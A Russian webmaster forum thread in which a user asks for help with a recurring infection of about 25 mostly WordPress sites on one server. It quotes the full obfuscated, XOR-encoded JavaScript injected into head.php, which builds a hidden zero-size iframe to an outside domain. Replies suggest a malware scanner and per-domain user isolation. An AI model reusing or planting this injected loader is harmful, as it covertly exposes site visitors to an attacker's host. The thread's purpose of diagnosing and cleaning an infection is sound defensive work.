вирус на серваке

WG
На сайте с 10.06.2013
Offline
45
1100

Собственно друзья такая ситуация, начался с сайтов ВП теперь заразил весь сервак (порядка 25 сайтов) - 95% которых ВП, в head.php прописывает следующее:

<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>

удаление не помогает, пару дней и все поновой, смена паролей чуть ли не от всего. совершенно не спасает, помогите пожалуйста

luckyJack
На сайте с 11.10.2010
Offline
79
#1

Aibolit в помощь. Скорее всего на сервер залиты левые PHP файлы, которые автоматом прописывают этот скрипт. Похоже на фрейм, у меня было такое не так давно.

Комплексный интернет-маркетинг (https://serblog.ru/nastrojka-i-vedenie-kontekstnoj-reklamy-yandeks-direkt-i-google-adwords/)
AR
На сайте с 23.11.2014
Offline
18
#2

На все папки с доменами один пользователь?

Надёжные VPC (https://selectel.ru/?ref_code=9PDbQ7YbKH32) для серьёзных проектов.
WG
На сайте с 10.06.2013
Offline
45
#3
AntonRa:
На все папки с доменами один пользователь?

ага, конечно один

AR
На сайте с 23.11.2014
Offline
18
#4

WoopyGoldberg, это "конечно один" скорей всего и заразило остальные папки с сайтами)

Для каждого домена (папки), нужно назначать владельцем - нового юзера, с ограниченным набором прав.

SeVlad
На сайте с 03.11.2008
Offline
1609
#5
WoopyGoldberg:
помогите пожалуйста

Помог - перенёс в правильный раздел. Теперь ты помоги себе сам - прочти первые 3 страницы закреплённого тут топика.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий